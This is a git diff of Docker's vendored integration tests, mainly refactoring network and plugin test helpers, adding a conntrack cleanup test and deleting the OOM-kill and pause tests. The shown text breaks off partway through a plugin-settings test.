 	defer deleteInterface(c, bridgeName)
 
-	err = s.d.StartWithBusybox("--bridge", bridgeName)
-	c.Assert(err, check.IsNil)
-	defer s.d.Restart()
+	s.d.StartWithBusybox(c, "--bridge", bridgeName)
+	defer s.d.Restart(c)
 
 	// run two containers and store first container's etc/hosts content
-	out, err = s.d.Cmd("run", "-d", "busybox", "top")
+	out, err := s.d.Cmd("run", "-d", "busybox", "top")
 	c.Assert(err, check.IsNil)
 	cid1 := strings.TrimSpace(out)
 	defer s.d.Cmd("stop", cid1)
@@ -865,18 +875,15 @@ func (s *DockerNetworkSuite) TestDockerNetworkAnonymousEndpoint(c *check.C) {
 	out, _ := dockerCmd(c, "run", "-d", "--net", cstmBridgeNw, "busybox", "top")
 	cid1 := strings.TrimSpace(out)
 
-	hosts1, err := readContainerFileWithExec(cid1, hostsFile)
-	c.Assert(err, checker.IsNil)
+	hosts1 := readContainerFileWithExec(c, cid1, hostsFile)
 
 	out, _ = dockerCmd(c, "run", "-d", "--net", cstmBridgeNw, "busybox", "top")
 	cid2 := strings.TrimSpace(out)
 
-	hosts2, err := readContainerFileWithExec(cid2, hostsFile)
-	c.Assert(err, checker.IsNil)
+	hosts2 := readContainerFileWithExec(c, cid2, hostsFile)
 
 	// verify first container etc/hosts file has not changed
-	hosts1post, err := readContainerFileWithExec(cid1, hostsFile)
-	c.Assert(err, checker.IsNil)
+	hosts1post := readContainerFileWithExec(c, cid1, hostsFile)
 	c.Assert(string(hosts1), checker.Equals, string(hosts1post),
 		check.Commentf("Unexpected %s change on anonymous container creation", hostsFile))
 
@@ -887,11 +894,8 @@ func (s *DockerNetworkSuite) TestDockerNetworkAnonymousEndpoint(c *check.C) {
 
 	dockerCmd(c, "network", "connect", cstmBridgeNw1, cid2)
 
-	hosts2, err = readContainerFileWithExec(cid2, hostsFile)
-	c.Assert(err, checker.IsNil)
-
-	hosts1post, err = readContainerFileWithExec(cid1, hostsFile)
-	c.Assert(err, checker.IsNil)
+	hosts2 = readContainerFileWithExec(c, cid2, hostsFile)
+	hosts1post = readContainerFileWithExec(c, cid1, hostsFile)
 	c.Assert(string(hosts1), checker.Equals, string(hosts1post),
 		check.Commentf("Unexpected %s change on container connect", hostsFile))
 
@@ -906,18 +910,16 @@ func (s *DockerNetworkSuite) TestDockerNetworkAnonymousEndpoint(c *check.C) {
 
 	// Stop named container and verify first two containers' etc/hosts file hasn't changed
 	dockerCmd(c, "stop", cid3)
-	hosts1post, err = readContainerFileWithExec(cid1, hostsFile)
-	c.Assert(err, checker.IsNil)
+	hosts1post = readContainerFileWithExec(c, cid1, hostsFile)
 	c.Assert(string(hosts1), checker.Equals, string(hosts1post),
 		check.Commentf("Unexpected %s change on name container creation", hostsFile))
 
-	hosts2post, err := readContainerFileWithExec(cid2, hostsFile)
-	c.Assert(err, checker.IsNil)
+	hosts2post := readContainerFileWithExec(c, cid2, hostsFile)
 	c.Assert(string(hosts2), checker.Equals, string(hosts2post),
 		check.Commentf("Unexpected %s change on name container creation", hostsFile))
 
 	// verify that container 1 and 2 can't ping the named container now
-	_, _, err = dockerCmdWithError("exec", cid1, "ping", "-c", "1", cName)
+	_, _, err := dockerCmdWithError("exec", cid1, "ping", "-c", "1", cName)
 	c.Assert(err, check.NotNil)
 	_, _, err = dockerCmdWithError("exec", cid2, "ping", "-c", "1", cName)
 	c.Assert(err, check.NotNil)
@@ -950,6 +952,7 @@ func (s *DockerNetworkSuite) TestDockerNetworkLinkOnDefaultNetworkOnly(c *check.
 }
 
 func (s *DockerNetworkSuite) TestDockerNetworkOverlayPortMapping(c *check.C) {
+	testRequires(c, SameHostDaemon)
 	// Verify exposed ports are present in ps output when running a container on
 	// a network managed by a driver which does not provide the default gateway
 	// for the container
@@ -976,7 +979,7 @@ func (s *DockerNetworkSuite) TestDockerNetworkOverlayPortMapping(c *check.C) {
 }
 
 func (s *DockerNetworkSuite) TestDockerNetworkDriverUngracefulRestart(c *check.C) {
-	testRequires(c, DaemonIsLinux, NotUserNamespace)
+	testRequires(c, DaemonIsLinux, NotUserNamespace, SameHostDaemon)
 	dnd := "dnd"
 	did := "did"
 
@@ -984,7 +987,7 @@ func (s *DockerNetworkSuite) TestDockerNetworkDriverUngracefulRestart(c *check.C
 	server := httptest.NewServer(mux)
 	setupRemoteNetworkDrivers(c, mux, server.URL, dnd, did)
 
-	s.d.StartWithBusybox()
+	s.d.StartWithBusybox(c)
 	_, err := s.d.Cmd("network", "create", "-d", dnd, "--subnet", "1.1.1.0/24", "net1")
 	c.Assert(err, checker.IsNil)
 
@@ -992,16 +995,12 @@ func (s *DockerNetworkSuite) TestDockerNetworkDriverUngracefulRestart(c *check.C
 	c.Assert(err, checker.IsNil)
 
 	// Kill daemon and restart
-	if err = s.d.cmd.Process.Kill(); err != nil {
-		c.Fatal(err)
-	}
+	c.Assert(s.d.Kill(), checker.IsNil)
 
 	server.Close()
 
 	startTime := time.Now().Unix()
-	if err = s.d.Restart(); err != nil {
-		c.Fatal(err)
-	}
+	s.d.Restart(c)
 	lapse := time.Now().Unix() - startTime
 	if lapse > 60 {
 		// In normal scenarios, daemon restart takes ~1 second.
@@ -1021,6 +1020,7 @@ func (s *DockerNetworkSuite) TestDockerNetworkDriverUngracefulRestart(c *check.C
 }
 
 func (s *DockerNetworkSuite) TestDockerNetworkMacInspect(c *check.C) {
+	testRequires(c, SameHostDaemon)
 	// Verify endpoint MAC address is correctly populated in container's network settings
 	nwn := "ov"
 	ctn := "bb"
@@ -1062,7 +1062,7 @@ func (s *DockerSuite) TestInspectAPIMultipleNetworks(c *check.C) {
 	c.Assert(bridge.IPAddress, checker.Equals, inspect121.NetworkSettings.IPAddress)
 }
 
-func connectContainerToNetworks(c *check.C, d *Daemon, cName string, nws []string) {
+func connectContainerToNetworks(c *check.C, d *daemon.Daemon, cName string, nws []string) {
 	// Run a container on the default network
 	out, err := d.Cmd("run", "-d", "--name", cName, "busybox", "top")
 	c.Assert(err, checker.IsNil, check.Commentf(out))
@@ -1076,7 +1076,7 @@ func connectContainerToNetworks(c *check.C, d *Daemon, cName string, nws []strin
 	}
 }
 
-func verifyContainerIsConnectedToNetworks(c *check.C, d *Daemon, cName string, nws []string) {
+func verifyContainerIsConnectedToNetworks(c *check.C, d *daemon.Daemon, cName string, nws []string) {
 	// Verify container is connected to all the networks
 	for _, nw := range nws {
 		out, err := d.Cmd("inspect", "-f", fmt.Sprintf("{{.NetworkSettings.Networks.%s}}", nw), cName)
@@ -1086,16 +1086,17 @@ func verifyContainerIsConnectedToNetworks(c *check.C, d *Daemon, cName string, n
 }
 
 func (s *DockerNetworkSuite) TestDockerNetworkMultipleNetworksGracefulDaemonRestart(c *check.C) {
+	testRequires(c, SameHostDaemon)
 	cName := "bb"
 	nwList := []string{"nw1", "nw2", "nw3"}
 
-	s.d.StartWithBusybox()
+	s.d.StartWithBusybox(c)
 
 	connectContainerToNetworks(c, s.d, cName, nwList)
 	verifyContainerIsConnectedToNetworks(c, s.d, cName, nwList)
 
 	// Reload daemon
-	s.d.Restart()
+	s.d.Restart(c)
 
 	_, err := s.d.Cmd("start", cName)
 	c.Assert(err, checker.IsNil)
@@ -1104,19 +1105,18 @@ func (s *DockerNetworkSuite) TestDockerNetworkMultipleNetworksGracefulDaemonRest
 }
 
 func (s *DockerNetworkSuite) TestDockerNetworkMultipleNetworksUngracefulDaemonRestart(c *check.C) {
+	testRequires(c, SameHostDaemon)
 	cName := "cc"
 	nwList := []string{"nw1", "nw2", "nw3"}
 
-	s.d.StartWithBusybox()
+	s.d.StartWithBusybox(c)
 
 	connectContainerToNetworks(c, s.d, cName, nwList)
 	verifyContainerIsConnectedToNetworks(c, s.d, cName, nwList)
 
 	// Kill daemon and restart
-	if err := s.d.cmd.Process.Kill(); err != nil {
-		c.Fatal(err)
-	}
-	s.d.Restart()
+	c.Assert(s.d.Kill(), checker.IsNil)
+	s.d.Restart(c)
 
 	// Restart container
 	_, err := s.d.Cmd("start", cName)
@@ -1132,8 +1132,8 @@ func (s *DockerNetworkSuite) TestDockerNetworkRunNetByID(c *check.C) {
 }
 
 func (s *DockerNetworkSuite) TestDockerNetworkHostModeUngracefulDaemonRestart(c *check.C) {
-	testRequires(c, DaemonIsLinux, NotUserNamespace)
-	s.d.StartWithBusybox()
+	testRequires(c, DaemonIsLinux, NotUserNamespace, SameHostDaemon)
+	s.d.StartWithBusybox(c)
 
 	// Run a few containers on host network
 	for i := 0; i < 10; i++ {
@@ -1141,22 +1141,18 @@ func (s *DockerNetworkSuite) TestDockerNetworkHostModeUngracefulDaemonRestart(c
 		out, err := s.d.Cmd("run", "-d", "--name", cName, "--net=host", "--restart=always", "busybox", "top")
 		c.Assert(err, checker.IsNil, check.Commentf(out))
 
-		// verfiy container has finished starting before killing daemon
-		err = s.d.waitRun(cName)
+		// verify container has finished starting before killing daemon
+		err = s.d.WaitRun(cName)
 		c.Assert(err, checker.IsNil)
 	}
 
 	// Kill daemon ungracefully and restart
-	if err := s.d.cmd.Process.Kill(); err != nil {
-		c.Fatal(err)
-	}
-	if err := s.d.Restart(); err != nil {
-		c.Fatal(err)
-	}
+	c.Assert(s.d.Kill(), checker.IsNil)
+	s.d.Restart(c)
 
 	// make sure all the containers are up and running
 	for i := 0; i < 10; i++ {
-		err := s.d.waitRun(fmt.Sprintf("hostc-%d", i))
+		err := s.d.WaitRun(fmt.Sprintf("hostc-%d", i))
 		c.Assert(err, checker.IsNil)
 	}
 }
@@ -1262,6 +1258,7 @@ func (s *DockerNetworkSuite) TestDockerNetworkRestartWithMultipleNetworks(c *che
 }
 
 func (s *DockerNetworkSuite) TestDockerNetworkConnectDisconnectToStoppedContainer(c *check.C) {
+	testRequires(c, SameHostDaemon)
 	dockerCmd(c, "network", "create", "test")
 	dockerCmd(c, "create", "--name=foo", "busybox", "top")
 	dockerCmd(c, "network", "connect", "test", "foo")
@@ -1269,7 +1266,7 @@ func (s *DockerNetworkSuite) TestDockerNetworkConnectDisconnectToStoppedContaine
 	c.Assert(networks, checker.Contains, "test", check.Commentf("Should contain 'test' network"))
 
 	// Restart docker daemon to test the config has persisted to disk
-	s.d.Restart()
+	s.d.Restart(c)
 	networks = inspectField(c, "foo", "NetworkSettings.Networks")
 	c.Assert(networks, checker.Contains, "test", check.Commentf("Should contain 'test' network"))
 
@@ -1288,7 +1285,7 @@ func (s *DockerNetworkSuite) TestDockerNetworkConnectDisconnectToStoppedContaine
 	c.Assert(networks, checker.Not(checker.Contains), "test", check.Commentf("Should not contain 'test' network"))
 
 	// Restart docker daemon to test the config has persisted to disk
-	s.d.Restart()
+	s.d.Restart(c)
 	networks = inspectField(c, "foo", "NetworkSettings.Networks")
 	c.Assert(networks, checker.Not(checker.Contains), "test", check.Commentf("Should not contain 'test' network"))
 
@@ -1419,7 +1416,7 @@ func verifyIPAddresses(c *check.C, cName, nwname, ipv4, ipv6 string) {
 
 func (s *DockerNetworkSuite) TestDockerNetworkConnectLinkLocalIP(c *check.C) {
 	// create one test network
-	dockerCmd(c, "network", "create", "n0")
+	dockerCmd(c, "network", "create", "--ipv6", "--subnet=2001:db8:1234::/64", "n0")
 	assertNwIsAvailable(c, "n0")
 
 	// run a container with incorrect link-local address
@@ -1543,10 +1540,10 @@ func (s *DockerSuite) TestUserDefinedNetworkConnectDisconnectAlias(c *check.C) {
 	dockerCmd(c, "network", "create", "-d", "bridge", "net1")
 	dockerCmd(c, "network", "create", "-d", "bridge", "net2")
 
-	cid, _ := dockerCmd(c, "run", "-d", "--net=net1", "--name=first", "--net-alias=foo", "busybox", "top")
+	cid, _ := dockerCmd(c, "run", "-d", "--net=net1", "--name=first", "--net-alias=foo", "busybox:glibc", "top")
 	c.Assert(waitRun("first"), check.IsNil)
 
-	dockerCmd(c, "run", "-d", "--net=net1", "--name=second", "busybox", "top")
+	dockerCmd(c, "run", "-d", "--net=net1", "--name=second", "busybox:glibc", "top")
 	c.Assert(waitRun("second"), check.IsNil)
 
 	// ping first container and its alias
@@ -1583,7 +1580,7 @@ func (s *DockerSuite) TestUserDefinedNetworkConnectDisconnectAlias(c *check.C) {
 	c.Assert(err, check.IsNil)
 
 	// verify the alias option is rejected when running on predefined network
-	out, _, err := dockerCmdWithError("run", "--rm", "--name=any", "--net-alias=any", "busybox", "top")
+	out, _, err := dockerCmdWithError("run", "--rm", "--name=any", "--net-alias=any", "busybox:glibc", "top")
 	c.Assert(err, checker.NotNil, check.Commentf("out: %s", out))
 	c.Assert(out, checker.Contains, runconfig.ErrUnsupportedNetworkAndAlias.Error())
 
@@ -1597,10 +1594,10 @@ func (s *DockerSuite) TestUserDefinedNetworkConnectivity(c *check.C) {
 	testRequires(c, DaemonIsLinux, NotUserNamespace)
 	dockerCmd(c, "network", "create", "-d", "bridge", "br.net1")
 
-	dockerCmd(c, "run", "-d", "--net=br.net1", "--name=c1.net1", "busybox", "top")
+	dockerCmd(c, "run", "-d", "--net=br.net1", "--name=c1.net1", "busybox:glibc", "top")
 	c.Assert(waitRun("c1.net1"), check.IsNil)
 
-	dockerCmd(c, "run", "-d", "--net=br.net1", "--name=c2.net1", "busybox", "top")
+	dockerCmd(c, "run", "-d", "--net=br.net1", "--name=c2.net1", "busybox:glibc", "top")
 	c.Assert(waitRun("c2.net1"), check.IsNil)
 
 	// ping first container by its unqualified name
@@ -1627,6 +1624,7 @@ func (s *DockerSuite) TestEmbeddedDNSInvalidInput(c *check.C) {
 func (s *DockerSuite) TestDockerNetworkConnectFailsNoInspectChange(c *check.C) {
 	dockerCmd(c, "run", "-d", "--name=bb", "busybox", "top")
 	c.Assert(waitRun("bb"), check.IsNil)
+	defer dockerCmd(c, "stop", "bb")
 
 	ns0 := inspectField(c, "bb", "NetworkSettings.Networks.bridge")
 
@@ -1644,9 +1642,9 @@ func (s *DockerSuite) TestDockerNetworkInternalMode(c *check.C) {
 	nr := getNetworkResource(c, "internal")
 	c.Assert(nr.Internal, checker.True)
 
-	dockerCmd(c, "run", "-d", "--net=internal", "--name=first", "busybox", "top")
+	dockerCmd(c, "run", "-d", "--net=internal", "--name=first", "busybox:glibc", "top")
 	c.Assert(waitRun("first"), check.IsNil)
-	dockerCmd(c, "run", "-d", "--net=internal", "--name=second", "busybox", "top")
+	dockerCmd(c, "run", "-d", "--net=internal", "--name=second", "busybox:glibc", "top")
 	c.Assert(waitRun("second"), check.IsNil)
 	out, _, err := dockerCmdWithError("exec", "first", "ping", "-W", "4", "-c", "1", "www.google.com")
 	c.Assert(err, check.NotNil)
@@ -1670,10 +1668,8 @@ func (s *DockerNetworkSuite) TestDockerNetworkCreateDeleteSpecialCharacters(c *c
 
 func (s *DockerDaemonSuite) TestDaemonRestartRestoreBridgeNetwork(t *check.C) {
 	testRequires(t, DaemonIsLinux)
-	if err := s.d.StartWithBusybox("--live-restore"); err != nil {
-		t.Fatal(err)
-	}
-	defer s.d.Stop()
+	s.d.StartWithBusybox(t, "--live-restore")
+	defer s.d.Stop(t)
 	oldCon := "old"
 
 	_, err := s.d.Cmd("run", "-d", "--name", oldCon, "-p", "80:80", "busybox", "top")
@@ -1690,9 +1686,7 @@ func (s *DockerDaemonSuite) TestDaemonRestartRestoreBridgeNetwork(t *check.C) {
 	}
 
 	// restart the daemon
-	if err := s.d.Start("--live-restore"); err != nil {
-		t.Fatal(err)
-	}
+	s.d.Start(t, "--live-restore")
 
 	// start a new container, the new container's ip should not be the same with
 	// old running container.
@@ -1789,3 +1783,53 @@ func (s *DockerNetworkSuite) TestDockerNetworkDisconnectFromBridge(c *check.C) {
 	_, _, err := dockerCmdWithError("network", "disconnect", network, name)
 	c.Assert(err, check.IsNil)
 }
+
+// TestConntrackFlowsLeak covers the failure scenario of ticket: https://github.com/docker/docker/issues/8795
+// Validates that conntrack is correctly cleaned once a container is destroyed
+func (s *DockerNetworkSuite) TestConntrackFlowsLeak(c *check.C) {
+	testRequires(c, IsAmd64, DaemonIsLinux, Network, SameHostDaemon)
+
+	// Create a new network
+	cli.DockerCmd(c, "network", "create", "--subnet=192.168.10.0/24", "--gateway=192.168.10.1", "-o", "com.docker.network.bridge.host_binding_ipv4=192.168.10.1", "testbind")
+	assertNwIsAvailable(c, "testbind")
+
+	// Launch the server, this will remain listening on an exposed port and reply to any request in a ping/pong fashion
+	cmd := "while true; do echo hello | nc -w 1 -lu 8080; done"
+	cli.DockerCmd(c, "run", "-d", "--name", "server", "--net", "testbind", "-p", "8080:8080/udp", "appropriate/nc", "sh", "-c", cmd)
+
+	// Launch a container client, here the objective is to create a flow that is natted in order to expose the bug
+	cmd = "echo world | nc -q 1 -u 192.168.10.1 8080"
+	cli.DockerCmd(c, "run", "-d", "--name", "client", "--net=host", "appropriate/nc", "sh", "-c", cmd)
+
+	// Get all the flows using netlink
+	flows, err := netlink.ConntrackTableList(netlink.ConntrackTable, unix.AF_INET)
+	c.Assert(err, check.IsNil)
+	var flowMatch int
+	for _, flow := range flows {
+		// count only the flows that we are interested in, skipping others that can be laying around the host
+		if flow.Forward.Protocol == unix.IPPROTO_UDP &&
+			flow.Forward.DstIP.Equal(net.ParseIP("192.168.10.1")) &&
+			flow.Forward.DstPort == 8080 {
+			flowMatch++
+		}
+	}
+	// The client should have created only 1 flow
+	c.Assert(flowMatch, checker.Equals, 1)
+
+	// Now delete the server, this will trigger the conntrack cleanup
+	cli.DockerCmd(c, "rm", "-fv", "server")
+
+	// Fetch again all the flows and validate that there is no server flow in the conntrack laying around
+	flows, err = netlink.ConntrackTableList(netlink.ConntrackTable, unix.AF_INET)
+	c.Assert(err, check.IsNil)
+	flowMatch = 0
+	for _, flow := range flows {
+		if flow.Forward.Protocol == unix.IPPROTO_UDP &&
+			flow.Forward.DstIP.Equal(net.ParseIP("192.168.10.1")) &&
+			flow.Forward.DstPort == 8080 {
+			flowMatch++
+		}
+	}
+	// All the flows have to be gone
+	c.Assert(flowMatch, checker.Equals, 0)
+}
diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_oom_killed_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_oom_killed_test.go
deleted file mode 100644
index bcf59f8601..0000000000
--- a/vendor/github.com/docker/docker/integration-cli/docker_cli_oom_killed_test.go
+++ /dev/null
@@ -1,30 +0,0 @@
-// +build !windows
-
-package main
-
-import (
-	"github.com/docker/docker/pkg/integration/checker"
-	"github.com/go-check/check"
-)
-
-func (s *DockerSuite) TestInspectOomKilledTrue(c *check.C) {
-	testRequires(c, DaemonIsLinux, memoryLimitSupport, swapMemorySupport)
-
-	name := "testoomkilled"
-	_, exitCode, _ := dockerCmdWithError("run", "--name", name, "--memory", "32MB", "busybox", "sh", "-c", "x=a; while true; do x=$x$x$x$x; done")
-
-	c.Assert(exitCode, checker.Equals, 137, check.Commentf("OOM exit should be 137"))
-
-	oomKilled := inspectField(c, name, "State.OOMKilled")
-	c.Assert(oomKilled, checker.Equals, "true")
-}
-
-func (s *DockerSuite) TestInspectOomKilledFalse(c *check.C) {
-	testRequires(c, DaemonIsLinux, memoryLimitSupport, swapMemorySupport)
-
-	name := "testoomkilled"
-	dockerCmd(c, "run", "--name", name, "--memory", "32MB", "busybox", "sh", "-c", "echo hello world")
-
-	oomKilled := inspectField(c, name, "State.OOMKilled")
-	c.Assert(oomKilled, checker.Equals, "false")
-}
diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_pause_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_pause_test.go
deleted file mode 100644
index 9217a69968..0000000000
--- a/vendor/github.com/docker/docker/integration-cli/docker_cli_pause_test.go
+++ /dev/null
@@ -1,66 +0,0 @@
-package main
-
-import (
-	"strings"
-
-	"github.com/docker/docker/pkg/integration/checker"
-	"github.com/go-check/check"
-)
-
-func (s *DockerSuite) TestPause(c *check.C) {
-	testRequires(c, IsPausable)
-	defer unpauseAllContainers()
-
-	name := "testeventpause"
-	runSleepingContainer(c, "-d", "--name", name)
-
-	dockerCmd(c, "pause", name)
-	pausedContainers, err := getSliceOfPausedContainers()
-	c.Assert(err, checker.IsNil)
-	c.Assert(len(pausedContainers), checker.Equals, 1)
-
-	dockerCmd(c, "unpause", name)
-
-	out, _ := dockerCmd(c, "events", "--since=0", "--until", daemonUnixTime(c))
-	events := strings.Split(strings.TrimSpace(out), "\n")
-	actions := eventActionsByIDAndType(c, events, name, "container")
-
-	c.Assert(actions[len(actions)-2], checker.Equals, "pause")
-	c.Assert(actions[len(actions)-1], checker.Equals, "unpause")
-}
-
-func (s *DockerSuite) TestPauseMultipleContainers(c *check.C) {
-	testRequires(c, IsPausable)
-	defer unpauseAllContainers()
-
-	containers := []string{
-		"testpausewithmorecontainers1",
-		"testpausewithmorecontainers2",
-	}
-	for _, name := range containers {
-		runSleepingContainer(c, "-d", "--name", name)
-	}
-	dockerCmd(c, append([]string{"pause"}, containers...)...)
-	pausedContainers, err := getSliceOfPausedContainers()
-	c.Assert(err, checker.IsNil)
-	c.Assert(len(pausedContainers), checker.Equals, len(containers))
-
-	dockerCmd(c, append([]string{"unpause"}, containers...)...)
-
-	out, _ := dockerCmd(c, "events", "--since=0", "--until", daemonUnixTime(c))
-	events := strings.Split(strings.TrimSpace(out), "\n")
-
-	for _, name := range containers {
-		actions := eventActionsByIDAndType(c, events, name, "container")
-
-		c.Assert(actions[len(actions)-2], checker.Equals, "pause")
-		c.Assert(actions[len(actions)-1], checker.Equals, "unpause")
-	}
-}
-
-func (s *DockerSuite) TestPauseFailsOnWindowsServerContainers(c *check.C) {
-	testRequires(c, DaemonIsWindows, NotPausable)
-	runSleepingContainer(c, "-d", "--name=test")
-	out, _, _ := dockerCmdWithError("pause", "test")
-	c.Assert(out, checker.Contains, "cannot pause Windows Server Containers")
-}
diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_plugins_logdriver_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_plugins_logdriver_test.go
new file mode 100644
index 0000000000..7d1ffcb632
--- /dev/null
+++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_plugins_logdriver_test.go
@@ -0,0 +1,48 @@
+package main
+
+import (
+	"context"
+	"strings"
+
+	"github.com/docker/docker/client"
+	"github.com/docker/docker/integration-cli/checker"
+	"github.com/go-check/check"
+)
+
+func (s *DockerSuite) TestPluginLogDriver(c *check.C) {
+	testRequires(c, IsAmd64, DaemonIsLinux)
+
+	pluginName := "cpuguy83/docker-logdriver-test:latest"
+
+	dockerCmd(c, "plugin", "install", pluginName)
+	dockerCmd(c, "run", "--log-driver", pluginName, "--name=test", "busybox", "echo", "hello")
+	out, _ := dockerCmd(c, "logs", "test")
+	c.Assert(strings.TrimSpace(out), checker.Equals, "hello")
+
+	dockerCmd(c, "start", "-a", "test")
+	out, _ = dockerCmd(c, "logs", "test")
+	c.Assert(strings.TrimSpace(out), checker.Equals, "hello\nhello")
+
+	dockerCmd(c, "rm", "test")
+	dockerCmd(c, "plugin", "disable", pluginName)
+	dockerCmd(c, "plugin", "rm", pluginName)
+}
+
+// Make sure log drivers are listed in info, and v2 plugins are not.
+func (s *DockerSuite) TestPluginLogDriverInfoList(c *check.C) {
+	testRequires(c, IsAmd64, DaemonIsLinux)
+	pluginName := "cpuguy83/docker-logdriver-test"
+
+	dockerCmd(c, "plugin", "install", pluginName)
+
+	cli, err := client.NewEnvClient()
+	c.Assert(err, checker.IsNil)
+	defer cli.Close()
+
+	info, err := cli.Info(context.Background())
+	c.Assert(err, checker.IsNil)
+
+	drivers := strings.Join(info.Plugins.Log, " ")
+	c.Assert(drivers, checker.Contains, "json-file")
+	c.Assert(drivers, checker.Not(checker.Contains), pluginName)
+}
diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_plugins_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_plugins_test.go
index 380357d303..391c74aa5d 100644
--- a/vendor/github.com/docker/docker/integration-cli/docker_cli_plugins_test.go
+++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_plugins_test.go
@@ -1,16 +1,22 @@
 package main
 
 import (
+	"context"
 	"fmt"
-	"os/exec"
-
-	"github.com/docker/docker/pkg/integration/checker"
-	"github.com/go-check/check"
-
 	"io/ioutil"
+	"net/http"
 	"os"
+	"path"
 	"path/filepath"
 	"strings"
+	"time"
+
+	"github.com/docker/docker/api/types"
+	"github.com/docker/docker/integration-cli/checker"
+	"github.com/docker/docker/integration-cli/cli"
+	"github.com/docker/docker/integration-cli/daemon"
+	"github.com/docker/docker/internal/test/fixtures/plugin"
+	"github.com/go-check/check"
 )
 
 var (
@@ -22,40 +28,40 @@ var (
 	npNameWithTag     = npName + ":" + pTag
 )
 
-func (s *DockerSuite) TestPluginBasicOps(c *check.C) {
-	testRequires(c, DaemonIsLinux, IsAmd64, Network)
-	_, _, err := dockerCmdWithError("plugin", "install", "--grant-all-permissions", pNameWithTag)
+func (ps *DockerPluginSuite) TestPluginBasicOps(c *check.C) {
+	plugin := ps.getPluginRepoWithTag()
+	_, _, err := dockerCmdWithError("plugin", "install", "--grant-all-permissions", plugin)
 	c.Assert(err, checker.IsNil)
 
 	out, _, err := dockerCmdWithError("plugin", "ls")
 	c.Assert(err, checker.IsNil)
-	c.Assert(out, checker.Contains, pName)
-	c.Assert(out, checker.Contains, pTag)
+	c.Assert(out, checker.Contains, plugin)
 	c.Assert(out, checker.Contains, "true")
 
-	id, _, err := dockerCmdWithError("plugin", "inspect", "-f", "{{.Id}}", pNameWithTag)
+	id, _, err := dockerCmdWithError("plugin", "inspect", "-f", "{{.Id}}", plugin)
 	id = strings.TrimSpace(id)
 	c.Assert(err, checker.IsNil)
 
-	out, _, err = dockerCmdWithError("plugin", "remove", pNameWithTag)
+	out, _, err = dockerCmdWithError("plugin", "remove", plugin)
 	c.Assert(err, checker.NotNil)
 	c.Assert(out, checker.Contains, "is enabled")
 
-	_, _, err = dockerCmdWithError("plugin", "disable", pNameWithTag)
+	_, _, err = dockerCmdWithError("plugin", "disable", plugin)
 	c.Assert(err, checker.IsNil)
 
-	out, _, err = dockerCmdWithError("plugin", "remove", pNameWithTag)
+	out, _, err = dockerCmdWithError("plugin", "remove", plugin)
 	c.Assert(err, checker.IsNil)
-	c.Assert(out, checker.Contains, pNameWithTag)
+	c.Assert(out, checker.Contains, plugin)
 
-	_, err = os.Stat(filepath.Join(dockerBasePath, "plugins", id))
+	_, err = os.Stat(filepath.Join(testEnv.DaemonInfo.DockerRootDir, "plugins", id))
 	if !os.IsNotExist(err) {
 		c.Fatal(err)
 	}
 }
 
-func (s *DockerSuite) TestPluginForceRemove(c *check.C) {
-	testRequires(c, DaemonIsLinux, IsAmd64, Network)
+func (ps *DockerPluginSuite) TestPluginForceRemove(c *check.C) {
+	pNameWithTag := ps.getPluginRepoWithTag()
+
 	out, _, err := dockerCmdWithError("plugin", "install", "--grant-all-permissions", pNameWithTag)
 	c.Assert(err, checker.IsNil)
 
@@ -69,6 +75,7 @@ func (s *DockerSuite) TestPluginForceRemove(c *check.C) {
 
 func (s *DockerSuite) TestPluginActive(c *check.C) {
 	testRequires(c, DaemonIsLinux, IsAmd64, Network)
+
 	_, _, err := dockerCmdWithError("plugin", "install", "--grant-all-permissions", pNameWithTag)
 	c.Assert(err, checker.IsNil)
 
@@ -116,8 +123,9 @@ func (s *DockerSuite) TestPluginActiveNetwork(c *check.C) {
 	c.Assert(out, checker.Contains, npNameWithTag)
 }
 
-func (s *DockerSuite) TestPluginInstallDisable(c *check.C) {
-	testRequires(c, DaemonIsLinux, IsAmd64, Network)
+func (ps *DockerPluginSuite) TestPluginInstallDisable(c *check.C) {
+	pName := ps.getPluginRepoWithTag()
+
 	out, _, err := dockerCmdWithError("plugin", "install", "--grant-all-permissions", "--disable", pName)
 	c.Assert(err, checker.IsNil)
 	c.Assert(strings.TrimSpace(out), checker.Contains, pName)
@@ -148,22 +156,66 @@ func (s *DockerSuite) TestPluginInstallDisableVolumeLs(c *check.C) {
 	dockerCmd(c, "volume", "ls")
 }
 
-func (s *DockerSuite) TestPluginSet(c *check.C) {
-	testRequires(c, DaemonIsLinux, IsAmd64, Network)
-	out, _ := dockerCmd(c, "plugin", "install", "--grant-all-permissions", "--disable", pName)
-	c.Assert(strings.TrimSpace(out), checker.Contains, pName)
-
-	env, _ := dockerCmd(c, "plugin", "inspect", "-f", "{{.Settings.Env}}", pName)
+func (ps *DockerPluginSuite) TestPluginSet(c *check.C) {
+	client := testEnv.APIClient()
+
+	name := "test"
+	ctx, cancel := context.WithTimeout(context.Background(), 60*time.Second)
+	defer cancel()
+
+	initialValue := "0"
+	mntSrc := "foo"
+	devPath := "/dev/bar"
+
+	// Create a new plugin with extra settings
+	err := plugin.Create(ctx, client, name, func(cfg *plugin.Config) {
+		cfg.Env = []types.PluginEnv{{Name: "DEBUG", Value: &initialValue, Settable: []string{"value"}}}
+		cfg.Mounts = []types.PluginMount{
+			{Name: "pmount1", Settable: []string{"source"}, Type: "none", Source: &mntSrc},
+			{Name: "pmount2", Settable: []string{"source"}, Type: "none"}, // Mount without source is invalid.
+		}
+		cfg.Linux.Devices = []types.PluginDevice{
+			{Name: "pdev1", Path: &devPath, Settable: []string{"path"}},
+			{Name: "pdev2", Settable: []string{"path"}}, // Device without Path is invalid.
+		}
+	})
+	c.Assert(err, checker.IsNil, check.Commentf("failed to create test plugin"))
+
+	env, _ := dockerCmd(c, "plugin", "inspect", "-f", "{{.Settings.Env}}", name)
 	c.Assert(strings.TrimSpace(env), checker.Equals, "[DEBUG=0]")
 
-	dockerCmd(c, "plugin", "set", pName, "DEBUG=1")
+	dockerCmd(c, "plugin", "set", name, "DEBUG=1")
 
-	env, _ = dockerCmd(c, "plugin", "inspect", "-f", "{{.Settings.Env}}", pName)
